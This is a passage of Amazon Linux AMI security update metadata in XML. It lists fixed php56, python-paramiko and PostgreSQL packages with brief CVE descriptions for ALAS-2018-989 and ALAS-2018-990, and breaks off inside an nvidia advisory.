arch="x86_64"><filename>Packages/php56-process-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-gd" 
version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.35" release="1.137.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-mssql-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.35" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.35-1.137.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.35-1.137.amzn1.i686.rpm</filename></package><package 
name="php56-intl" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.35" release="1.137.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-enchant-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.35" 
release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.35-1.137.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.35" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.35-1.137.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-989</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-989: critical priority package update for python-paramiko</title><issued date="2018-04-05 16:41:00" /><updated date="2018-04-05 23:15:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7750:
transport.py in the SSH server implementation of Paramiko before 1.17.6, 1.18.x before 1.18.5, 2.0.x before 2.0.8, 2.1.x before 2.1.5, 2.2.x before 2.2.3, 2.3.x before 2.3.2, and 2.4.x before 2.4.1 does not properly check whether authentication is completed before processing other requests, as demonstrated by channel-open. A customized SSH client can simply skip the authentication step.
1557130:
CVE-2018-7750 python-paramiko: Authentication bypass in transport.py
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7750" title="" id="CVE-2018-7750" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-paramiko" version="1.15.1" release="2.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-paramiko-1.15.1-2.6.amzn1.noarch.rpm</filename></package><package name="python27-paramiko" version="1.15.1" release="2.6.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-paramiko-1.15.1-2.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-990</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-990: medium priority package update for postgresql93 postgresql94 postgresql95 postgresql96</title><issued date="2018-04-05 16:55:00" /><updated date="2018-04-05 23:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1058:
A flaw was found in the way PostgreSQL allowed a user to modify the behavior of a query for other users. An attacker with a user account could use this flaw to execute code with the permissions of the database superuser.
1547044:
CVE-2018-1058 postgresql: Uncontrolled search path element in pg_dump and other client applications
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1058" title="" id="CVE-2018-1058" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96-libs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.8" release="1.80.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql96-devel-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.8" release="1.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.8-1.80.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.8" release="1.80.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql96-devel-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.8" release="1.80.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.8-1.80.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-docs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.12" release="1.78.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.12-1.78.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-server" 
version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.12" release="1.78.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.12-1.78.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.22" release="1.70.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.22" release="1.70.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.22-1.70.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.22" 
release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.22" release="1.70.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.22-1.70.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.17" 
release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.17" release="1.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.17-1.74.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.17-1.74.amzn1.i686.rpm</filename></package><package 
name="postgresql94" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.17-1.74.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.17" release="1.74.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.17-1.74.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-991</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-991: medium priority package update for nvidia</title><issued date="2018-04-05 17:01:00" /><updated date="2018-04-05 23:19:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-6253:
CVE-2018-6252:
CVE-2018-6251:
CVE-2018-6250:
CVE-2018-6249:
CVE-2018-6248:
CVE-2018-6247:
